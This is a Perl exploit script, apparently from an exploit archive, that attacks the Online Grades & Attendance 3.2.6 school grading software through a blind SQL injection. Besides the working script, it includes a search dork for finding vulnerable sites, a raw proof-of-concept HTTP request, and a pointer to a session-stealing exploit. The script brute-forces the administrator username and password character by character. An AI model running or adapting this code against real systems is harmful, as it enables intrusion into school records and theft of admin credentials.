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Online Grades & Attendance 3.2.6 Blind SQL Injection Exploit
============================================================ Online Grades & Attendance 3.2.6 Blind SQL Injection Exploit ============================================================ #!/usr/bin/perl #*********************************************************************************************** #*********************************************************************************************** # #---------------------------------------------------------------------------------------------- #| (Post Form --> 'cc') Blind (SQLi) EXPLOIT | #|--------------------------------------------------------------------------------------------| #| | Online Grades & Attendance v-3.2.6 | | #| CMS INFORMATION: ----------------------------------------- | #| | #|-->WEB: http://www.onlinegrades.org/ | #|-->DOWNLOAD: http://www.onlinegrades.org/ | #|-->DEMO: http://www.onlinegrades.org/demo_info | #|-->CATEGORY: CMS / Education | #|-->DESCRIPTION: Online Grades is based on the project, Basmati. It has all of the same | #| features plus many new features. OG is a web based grade... | #|-->RELEASED: 2009-02-05 | #| | #| CMS VULNERABILITY: | #| | #|-->TESTED ON: firefox 3 | #|-->DORK: "Powered by Online Grades" | #|-->CATEGORY: BLIND SQL INJECTION EXPLOIT | #|-->AFFECT VERSION: <= 3.2.6 | #|-->Discovered Bug date: 2009-05-21 | #|-->Reported Bug date: 2009-05-21 | #|-->Fixed bug date: Not fixed | #|-->Info patch: Not fixed | #|-->Author: YEnH4ckEr | #|-->WEB/BLOG: N/A | #|-->COMMENT: A mi novia Marijose...hermano,cunyada, padres (y amigos xD) por su apoyo. | #|-->EXTRA-COMMENT: Gracias por aguantarme a todos! (Te kiero xikitiya!) | #---------------------------------------------------------------------------------------------- # #------------ #CONDITIONS: #------------ # #gpc_magic_quotes=OFF # #------- #NEED: #------- # #Valid registered parent (PHPSESSID) (Use parent stealer --> http://www.milw0rm.com/exploits/8843) # #Used this post info --> TchrUserID=faculty%40onlinegrades.org&sid=4122&schoolid=DEMO&cc=LART101 # #--------------------------------------- #PROOF OF CONCEPT (SQL INJECTION): #--------------------------------------- # #POST http://www.onlinegrades.org/demo/parents/parents.php?func=showteachermemo HTTP/1.1 #Host: www.onlinegrades.org #User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv: Gecko/2009042316 Firefox/3.0.10 Paros/3.2.13 #Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 #Accept-Language: es-es,es;q=0.8,en-us;q=0.5,en;q=0.3 #Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 #Keep-Alive: 300 #Proxy-Connection: keep-alive #Referer: http://www.onlinegrades.org/demo/parents/parents.php?func=showreportcard #Cookie: SESS82c464aff4a6373c38ca1d81df10661e=li1lag4844furho010a5ok8uq7; PHPSESSID=2ofepluotebqj7qu009qskaeg7 #Content-Type: application/x-www-form-urlencoded #Content-length: 72 #TchrUserID=faculty%40onlinegrades.org&sid=4122&schoolid=DEMO&cc=LART101'+AND+1=1# --> TRUE #TchrUserID=faculty%40onlinegrades.org&sid=4122&schoolid=DEMO&cc=LART101'+AND+1=0# --> FALSE # # # use LWP::UserAgent; use HTTP::Request; #Subroutines sub lw { my $SO = $^O; my $linux = ""; if (index(lc($SO),"win")!=-1){ $linux="0"; }else{ $linux="1"; } if($linux){ system("clear"); } else{ system("cls"); system ("title Online Grades Attendance v-3.2.6 Blind SQL Injection Exploit"); system ("color 04"); } } sub request { my $userag = LWP::UserAgent->new; $userag -> agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)'); if($_[2] eq "post"){ $request = HTTP::Request -> new(POST => $_[0]); $request->referer($_[0]); $request->header(cookie => "PHPSESSID=".$_[3]); $request->content_type('application/x-www-form-urlencoded'); $request->content($_[1]); }else{ $request = HTTP::Request -> new(GET => $_[0]); } my $outcode= $userag->request($request)->as_string; #print $outcode; #--> Active this line for debugger mode return $outcode; } sub error { print "\t------------------------------------------------------------\n"; print "\tWeb isn't vulnerable!\n\n"; print "\t--->Maybe:\n\n"; print "\t\t1.-Patched.\n"; print "\t\t2.-Bad path or host.\n"; print "\t\t3.-Bad PHPSESSID value.\n"; print "\t\t4.-Bad POST value.\n"; print "\t\tEXPLOIT FAILED!\n"; print "\t------------------------------------------------------------\n"; } sub errormagicquotes { print "\t------------------------------------------------------------\n"; print "\tWeb isn't vulnerable!\n\n"; print "\t\tRaison--> Magic quotes ON.\n"; print "\t\tEXPLOIT FAILED!\n"; print "\t------------------------------------------------------------\n"; } sub testedblindsql { print "\t-----------------------------------------------------------------\n"; print "\tWEB MAYBE BE VULNERABLE!\n\n"; print "\tTested Blind SQL Injection.\n"; print "\tStarting exploit...\n"; print "\t-----------------------------------------------------------------\n\n"; } sub helper { print "\n\t[!!!] Online Grades & Attendance <= v-3.2.6 Blind SQLi Exploit\n"; print "\t[!!!] USAGE MODE: [!!!]\n"; print "\t[!!!] perl $0 [HOST] [PATH] [PHPSESSID] [POST]\n"; print "\t[!!!] [HOST]: Web.\n"; print "\t[!!!] [PATH]: Home Path.\n"; print "\t[!!!] [PHPSESSID]: Set PHPSESSID value\n"; print "\t[!!!] [POST]: Set POST value\n"; print "\t[!!!] Example: perl $0 'www.onlinegrades.org' 'demo' 'ej67dt4jdjd57fdv6fkvqquh05' 'TchrUserID=faculty%40onlinegrades.org&sid=4122&schoolid=DEMO&cc=LART101' \n"; } sub brute_length{ #Column length $exit=0; $i=0; while($exit==0){ my $blindsql=$_[2]."'+AND+(SELECT+length(".$_[1].")+FROM+ADMINS+WHERE+id=1)=".$i++."#"; #injected code $output=&request($_[0],$blindsql,'post',$_[3]); if($output !~ (/Can't get Memo info for Course Code/)){ $exit=1; }else{ $exit=0; } #This is the max length of client_id and client_pw if($i>80){ &error; exit(1); } } #Save column length $length=$i-1; print "\t<<<<<--------------------------------------------------------->>>>>\n"; print "\tLength catched!\n"; print "\tLength ".$_[1]." --> ".$length."\n"; print "\tWait several minutes...\n"; print "\t<<<<<--------------------------------------------------------->>>>>\n\n"; return $length; } sub exploiting { #Bruteforcing values $values=""; $k=1; $z=45; while(($k<=$_[1]) && ($z<=126)){ my $blindsql=$_[3]."'+AND+ascii(substring((SELECT+".$_[2]."+FROM+ADMINS+WHERE+id=1),".$k.",1))=".$z."#"; $output=&request($_[0],$blindsql,'post',$_[4]); if ($output !~ (/Can't get Memo info for Course Code/)) { $values=$values.chr($z); $k++; $z=45; } #new char $z++; } return $values; } #Main &lw; print "\t#######################################################\n\n"; print "\t#######################################################\n\n"; print "\t## Online Grades & Attendance <= v-3.2.6 ##\n\n"; print "\t## Blind SQL Injection Exploit ##\n\n"; print "\t## ++Conditions: magic_quotes=OFF ##\n\n"; print "\t## ++Needed: Registered parend (PHPSESSID) ##\n\n"; print "\t## Author: Y3nh4ck3r ##\n\n"; print "\t## Proud to be Spanish! ##\n\n"; print "\t#######################################################\n\n"; print "\t#######################################################\n\n"; #Init variables my $host=$ARGV[0]; my $path=$ARGV[1]; my $PHPSESSID=$ARGV[2]; my $POST=$ARGV[3]; $numArgs = $#ARGV + 1; if($numArgs<=3) { &helper; exit(1); } #Build uri my $finalhost="http://".$host."/".$path."/parents/parents.php?func=showteachermemo"; my $phpinfo="http://".$host."/".$path."/include/phpinfo.php"; #magic quotes on? $output=&request($phpinfo,0,'get',0); if($output=~(/\<tr\>\<td class\=\"e\">magic\_quotes\_gpc\<\/td\>\<td class\=\"v\"\>On\<\/td\>\<td class\=\"v\"\>On\<\/td\>\<\/tr\>/)){ &errormagicquotes; exit(1); } $finalrequest = $finalhost; #Testing blind sql injection $send_post1=$POST."'+AND+1=0#"; $output1=&request($finalrequest,$send_post1,'post',$PHPSESSID); $send_post2=$POST."'+AND+1=1#"; $output2=&request($finalrequest,$send_post2,'post',$PHPSESSID); if ($output1 eq $output2) { #Not injectable &error; exit(1); }else{ #blind sql injection is available &testedblindsql; } #Bruteforcing length $length_user=&brute_length($finalrequest,'client_id',$POST,$PHPSESSID); #Bruteforcing username... $user=&exploiting($finalrequest,$length_user,'client_id',$POST,$PHPSESSID); #Bruteforcing length $length_pw=&brute_length($finalrequest,'client_pw',$POST,$PHPSESSID); #Bruteforcing password... $pw=&exploiting($finalrequest,$length_pw,'client_pw',$POST,$PHPSESSID); #final checking if((!$user) || (!$pw)){ &error; exit(1); } print "\n\t\t*************************************************\n"; print "\t\t********* EXPLOIT EXECUTED SUCCESSFULLY ********\n"; print "\t\t*************************************************\n\n"; print "\t\tAdmin-username: ".$user."\n"; print "\t\tAdmin-password: ".$pw."\n\n"; print "\n\t\t<<----------------------FINISH!-------------------->>\n\n"; exit(1); #Ok...all job done # 0day.today [2024-12-23] #